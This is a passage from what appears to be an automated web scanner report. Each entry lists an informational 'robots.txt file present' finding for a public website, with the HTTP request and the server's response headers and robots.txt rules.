Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

29.32. http://financial-services-summarize-the-web.blogspot.com/2011/04/in-exchange-rate-bangkok-bank-exchange.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://financial-services-summarize-the-web.blogspot.com
Path:   /2011/04/in-exchange-rate-bangkok-bank-exchange.html/x22

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: financial-services-summarize-the-web.blogspot.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Wed, 04 May 2011 08:09:55 GMT
Date: Tue, 03 May 2011 08:09:55 GMT
Last-Modified: Mon, 02 May 2011 11:01:16 GMT
ETag: "24026498-74e0-4af6-8695-a0a31395506c"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400, proxy-revalidate, must-revalidate
Age: 18755

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search
Disallow: /related-content.g
Disallow: /related_content_helper.html

Sitemap: http://financial-services-summarize-the-web.b
...[SNIP]...

29.33. http://go.microsoft.com/fwlink/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.microsoft.com
Path:   /fwlink/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: go.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 27 Oct 2005 18:42:43 GMT
Accept-Ranges: bytes
ETag: "a03b9f3726dbc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:22:34 GMT
Connection: keep-alive
Content-Length: 80

# Robots.txt file for http://go.microsoft.com
#

User-agent: *
Disallow: /

29.34. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1045272592/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1045272592/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2011 13:33:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

29.35. http://ipinfusion.com/products/data_sheets.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipinfusion.com
Path:   /products/data_sheets.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ipinfusion.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:40 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 17:05:35 GMT
ETag: "6e08cb-18-5dfb15c0"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /


29.36. http://ja.wikipedia.org/wiki/ă?żă?¤ă?®é??čˇ?ă?®ä¸?覧  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ja.wikipedia.org
Path:   /wiki/........................

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ja.wikipedia.org

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:23:09 GMT
Server: Apache
Cache-Control: s-maxage=3600, must-revalidate, max-age=0
X-Article-ID: 1752085
X-Language: ja
X-Site: wikipedia
Last-Modified: Tue, 8 Feb 2011 18:53:57 GMT
Vary: Accept-Encoding
Content-Length: 23841
Content-Type: text/plain; charset=utf-8
X-Cache: HIT from sq73.wikimedia.org
X-Cache-Lookup: HIT from sq73.wikimedia.org:3128
Age: 38
X-Cache: HIT from sq36.wikimedia.org
X-Cache-Lookup: HIT from sq36.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...

29.37. http://jquery.org/license  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.org
Path:   /license

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jquery.org

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:24:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://jquery.org/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

29.38. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jqueryui.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 03 May 2011 13:24:13 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 02 Nov 2010 19:50:26 GMT
ETag: "238013-27-494173c706480"
Accept-Ranges: bytes
Content-Length: 39
X-Served-By: www4
X-Proxy: 2

User-agent: *
Disallow: /repository/

29.39. http://ktbcare.hi5.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ktbcare.hi5.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ktbcare.hi5.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"216-1275608514000"
Last-Modified: Thu, 03 Jun 2010 23:41:54 GMT
Content-Type: text/plain
Content-Length: 216
Date: Tue, 03 May 2011 13:24:13 GMT
Connection: keep-alive
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246b3143660;expires=Tue, 03-May-11 13:46:02 GMT;path=/

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /friend/message/displayMessageCenter.do
Disallow: /friend/viewFriends.do
Disallow: /friend/displayLogin.do
Disallow: /friend
...[SNIP]...

29.40. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 Apr 2011 11:05:10 GMT
ETag: "d71005-1b-4a0b6aa63c580"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 03 May 2011 13:33:22 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


29.41. http://mail.google.com/mail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.google.com
Path:   /mail/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mail.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 13:23:38 GMT
Expires: Tue, 03 May 2011 13:23:38 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.42. http://meta.wikimedia.org/w/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /w/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: meta.wikimedia.org

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:30:44 GMT
Server: Apache
Cache-Control: s-maxage=3600, must-revalidate, max-age=0
X-Article-ID: 137623
X-Language: meta
X-Site: wikipedia
Last-Modified: Tue, 23 Mar 2010 17:05:37 GMT
Vary: Accept-Encoding
Content-Length: 18579
Content-Type: text/plain; charset=utf-8
Age: 814
X-Cache: HIT from sq78.wikimedia.org
X-Cache-Lookup: HIT from sq78.wikimedia.org:3128
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...

29.43. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.seenon.com
Path:   /b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.seenon.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:24 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "541bf-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www388
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.44. http://mls.marchex.com/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mls.marchex.com
Path:   /c

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mls.marchex.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:23:38 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Fri, 22 Sep 2006 17:09:29 GMT
ETag: "4f4052-1a-41e0de7310440"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

29.45. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/help/rss/4498287.stm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.bbc.co.uk

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
Date: Tue, 03 May 2011 13:24:15 GMT
Keep-Alive: timeout=10, max=796
Connection: close
Set-Cookie: BBC-UID=b42d4cf02071ef7f73938184113f5d78addacff870d041fa24ab9a05fde066040; expires=Wed, 02-May-12 13:24:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b42d4cf02071ef7f73938184113f5d78addacff870d041fa24ab9a05fde066040; expires=Wed, 02-May-12 13:24:15 GMT; path=/; domain=bbc.co.uk;
Last-Modified: Thu, 24 Feb 2011 17:30:37 GMT
Content-Length: 464

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

29.46. http://news.google.com/news/story  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/story

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 13:24:29 GMT
Expires: Tue, 03 May 2011 13:24:29 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.47. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=84211312
Expires: Thu, 02 Jan 2014 04:28:53 GMT
Date: Tue, 03 May 2011 12:27:01 GMT
Connection: close

User-agent: *
Disallow: /

29.48. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:42:30 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

29.49. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/BT-CO-20110428-705019.html/x22

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:24:28 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 15:25:42 GMT
Accept-Ranges: bytes
Content-Length: 1471
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=22
Connection: Keep-Alive
Content-Type: text/plain

##ACAP version=1.0

User-agent: *
Disallow: /article_email/
Disallow: /article_print/
Disallow: /PA2VJBNA4R/
Disallow: /home/
Disallow: /advanced_search/
Disallow: /login/
Disallow: /acct/
D
...[SNIP]...

29.50. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808506.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: onlinehelp.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAC8BwAAlrIt5VBIpQQA+YaAv5Drdg!!&M=1; domain=.microsoft.com; expires=Fri, 03-May-2041 13:23:13 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:23:14 GMT
Connection: keep-alive
Content-Length: 266

User-agent: *
Disallow:
sitemap:http://onlinehelp.microsoft.com/en-us/sitemapindex.xml
sitemap:http://onlinehelp.microsoft.com/en-us/office365-smallbusinesses/sitemapindex.xml
sitemap:http://onlin
...[SNIP]...

29.51. http://pagead2.googlesyndication.com/pagead/imgad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2011 13:33:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

29.52. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2011 13:23:21 GMT
Expires: Tue, 03 May 2011 13:23:21 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /lh/albumList
Allow: /lh/album
Allow: /lh/favorites
Allow: /lh/idredir
Allow: /lh/photo
Allow: /lh/sredir
Disallow: /lh/

29.53. http://piwik.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://piwik.org
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: piwik.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:03 GMT
Server: Apache
Last-Modified: Wed, 07 Apr 2010 08:17:03 GMT
ETag: "e30821-39-2fdf9dc0"
Accept-Ranges: bytes
Content-Length: 57
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /documentation/
Disallow: /demo/

29.54. http://plugins.jquery.com/node/1208]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://plugins.jquery.com
Path:   /node/1208]

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: plugins.jquery.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:24:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 05 Sep 2010 20:55:36 GMT
ETag: "5750074-636-62b28200"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 13:24:49 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

29.55. http://randomfactsthailand.com/thailand-breast-slap-sudden-breast-growth-without-surgery/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://randomfactsthailand.com
Path:   /thailand-breast-slap-sudden-breast-growth-without-surgery/x22

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: randomfactsthailand.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://randomfactsthailand.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://randomfactsthailand.com/sitemap.xml.gz

29.56. http://s7.addthis.com/static/r07/sh41.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /static/r07/sh41.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 19 Apr 2011 11:03:18 GMT
ETag: "e01e35-1b-4a143749a6980"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 03 May 2011 13:33:19 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


29.57. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 13:16:04 GMT
Expires: Tue, 03 May 2011 13:16:04 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.58. http://scriptlogiccorp.d2.sc.omtrdc.net/b/ss/slcproduction/1/H.22.1/s27267301290655  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scriptlogiccorp.d2.sc.omtrdc.net
Path:   /b/ss/slcproduction/1/H.22.1/s27267301290655

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: scriptlogiccorp.d2.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:23 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "20192-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www354
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

29.59. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.bot.or.th
Path:   /dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sdc.bot.or.th

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/plain
Last-Modified: Wed, 07 Mar 2007 05:00:42 GMT
Accept-Ranges: bytes
ETag: "079688e7560c71:528"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 11:44:20 GMT
Connection: close

##############################
#
# WebTrends SmartSource Data Collector
# Copyright (c) 1996-2007 WebTrends Inc. All rights reserved.
# $DateTime: 2007/02/02 09:50:38 $
#
######################
...[SNIP]...

29.60. http://search.yahoo.com/mrss/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /mrss/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:49 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 19 Nov 2010 04:40:22 GMT
Accept-Ranges: bytes
Content-Length: 67
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /search
Disallow: /bin
Disallow: /language

29.61. https://secure.wikimedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.wikimedia.org
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.wikimedia.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:22 GMT
Server: Apache
Last-Modified: Mon, 26 Dec 2005 07:57:16 GMT
ETag: "32-408ceb7284f00"
Accept-Ranges: bytes
Content-Length: 50
Content-Type: text/plain
Via: 1.0 secure.wikimedia.org
Connection: close

# secure.wikimedia.org

User-Agent: *
Disallow: /

29.62. http://sorgalla.com/jcarousel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sorgalla.com
Path:   /jcarousel/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sorgalla.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:56 GMT
Server: Apache
Link: <http://sorgalla.com/?p=519>; rel=shortlink
Vary: Cookie
X-Pingback: http://sorgalla.com/xmlrpc.php
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"

User-agent: *
Disallow:

29.63. http://stackoverflow.com/questions/467336  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /questions/467336

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stackoverflow.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 22:49:11 GMT
Accept-Ranges: bytes
ETag: "23947daf5efcb1:0"
Date: Tue, 03 May 2011 13:25:53 GMT
Connection: close
Content-Length: 1450

User-Agent: *
Disallow: /posts/
Disallow: /posts?
Disallow: /ask/
Disallow: /ask?
Disallow: /search/
Disallow: /search?
Disallow: /feeds/
Disallow: /feeds?
Disallow: /users/login/
Disallow:
...[SNIP]...

29.64. http://th.linkedin.com/in/narongchai  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://th.linkedin.com
Path:   /in/narongchai

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: th.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-872004964"
Last-Modified: Wed, 06 Apr 2011 03:23:52 GMT
Content-Length: 24473
Connection: keep-alive
Date: Tue, 03 May 2011 13:27:15 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

29.65. http://th.wikipedia.org/wiki/รายŕ¸?ืŕą?อŕ¸?ŕ¸?าŕ¸?ารŕą?ŕ¸?ŕ¸?ระŕą?ŕ¸?ศŕą?ŕ¸?ย  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://th.wikipedia.org
Path:   /wiki/........................................................................

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: th.wikipedia.org

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:14:47 GMT
Server: Apache
Cache-Control: s-maxage=3600, must-revalidate, max-age=0
X-Article-ID: 0
X-Language: th
X-Site: wikipedia
Last-Modified: Sat, 18 Apr 2009 13:54:29 GMT
Content-Length: 16243
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Age: 748
X-Cache: HIT from sq76.wikimedia.org
X-Cache-Lookup: HIT from sq76.wikimedia.org:3128
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...

29.66. http://thailandforvisitors.com/general/holidays/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thailandforvisitors.com
Path:   /general/holidays/x22

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: thailandforvisitors.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:35 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 15 Dec 2003 03:23:58 GMT
ETag: "d42001e-22-67826f80"
Accept-Ranges: bytes
Content-Length: 34
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

29.67. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Tue, 03 May 2011 13:17:13 GMT
Expires: Tue, 03 May 2011 13:17:13 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.68. http://topics.nytimes.com/top/news/business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: topics.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 03 May 2011 13:27:20 GMT
Content-length: 1091
Content-type: text/plain
Last-modified: Tue, 10 Feb 2009 19:58:56 GMT
Accept-ranges: bytes
Connection: keep-alive

# robots.txt, topics.nytimes.com 01/21/2009
#
User-agent: *
Disallow: /adx/bin/
Disallow: /aponline/
Disallow: /archives/
Disallow: /cnet/
Disallow: /college/
Disallow: /external/
Disallow: /financial
...[SNIP]...

29.69. http://translate.google.com/translate_t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.google.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:23 GMT
Expires: Tue, 03 May 2011 13:27:23 GMT
Cache-Control: private, max-age=0
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: PREF=ID=a9db3a3cc223d85b:TM=1304429243:LM=1304429243:S=kGSUPCHLlpqexhis; expires=Thu, 02-May-2013 13:27:23 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /?q=
